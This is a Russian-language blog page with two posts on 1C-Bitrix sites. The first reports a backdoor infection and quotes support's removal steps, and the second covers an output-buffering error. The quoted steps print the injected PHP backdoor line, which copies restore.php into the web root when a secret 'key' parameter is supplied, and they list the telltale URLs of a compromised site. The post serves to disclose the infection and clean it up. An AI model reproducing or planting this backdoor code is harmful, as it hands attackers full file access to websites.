Производство фотообоев в Новосибирске. Интернет магазин фотообоев. Изготовление - один день! Каталог 10 000 изображений!
31 Октябрь 2018

Вирусы и трояны на Битрикс сайте

Всем привет!

Уже на третьем сайте под управлением CMS Битрикс (разные лицензии) обнаруживаю одни и те-же бэкдоры и трояны, причём непосредственно в файлах движка Битрикса!
Инструмент монитор качества «Ядро проекта не модифицировалось» такие файлы не ловит т.к. это не модифицированные, а просто левые файлы.
Но вот почему модификацию /bitrix/modules/main/include.php не находит — уже вопрос
Вообще файлик этот довольно мутный — в нём присутствует обфуцированный код, причём легальный — от конторы 1С Битрикс. (что и раздражает — вирусу легко можно спрятаться под этот код)

На крайнем проекте уже не выдержал и написал в саппорт вопрос о технологии поиска лишних файлов, на что получил не совсем то, что хотел, но думаю для поиска таких типичных вирусов это неплохая инструкция (вообще думаю в движке была дырка, которая не афишируется, через которую и произошла иньекция — т.к. сайты абсолютно разные, а вирусятина одна и та же!)

ЦИТАТА
Добрый день!

Да, это вирус.

Вам необходимо:
1. Сделать полную резервную копию сайта.
2. Удалить restore.php из корня сайта.
3. Удалить посторонний скрипт /bitrix/js/main/core/core_loader.js
4. Отредактировать /bitrix/modules/main/include.php, удалив из него строчки:

require_once($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/gadgets/bitrix/weather/lang/ru/exec/include.php");

if($_REQUEST["key"]!=""){if($_REQUEST["key"]=="a".md5("B_PROLOG_INCLUDED")."e"){$resu1t=copy($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/admin/restore.php",$_SERVER["DOCUMENT_ROOT"]."/restore.php");if($resu1t){die("ok");}else{die("fail");}}};

5. Удалить /bitrix/gadgets/bitrix/weather/lang/ru/exec/include.php и /bitrix/tools/check_files.php

если открывается http:// сайт /?utm_term=version — ваш сайт взломан с полным управлением у злоумышленника!
если открывается http:// сайт /bitrix/js/main/core/core_loader.js — ваш сайт взломан с полным управлением у злоумышленника!
если в корне лежит restore.php (а его там раньше не было) — тоже самое!

Заражение в действии — злоумышленник получает полный файловый доступ к сайту!

Вот такая приколюха!

рубрики: Bitrix, security, взлом и безопасность | Комментарии (1)

1 Октябрь 2018

Cannot use output buffering in output buffering display handlers in /bitrix/modules/main/lib/data/cache.php

Ни с того, ни с сего — начал падать сайт под управлением движка 1С Битрикс.
Никто ничего с сайтом не делает — сам валится и всё тут.
В логах веб сервера множество таких записей
«Cannot use output buffering in output buffering display handlers in /bitrix/modules/main/lib/data/cache.php»
Довольно много гуглил и пробовал — ничего не помогло, методом научного тыка вычислил, что проблема очень подозрительном файле ядра
/bitrix/modules/main/include.php
подозрительность в том, что 1. код частично закодирован! 2. файл самостоятельно обновляется!
я его с ядра другого сайта перезаписал — ошибка ушла, но через некоторое время он обновился до той же длинны, что и была — и бай бай сайту — снова так же ошибка с кэшем

Предположу, что там какой то код на счёт валидности лицензии и там то и разработчики что-то накосячили (скорее всего в эхо ушел какой то невидимый символ типа переноса строки)
Отправил запрос в саппорт — жду ответ!

рубрики: Bitrix | Комментарии (0)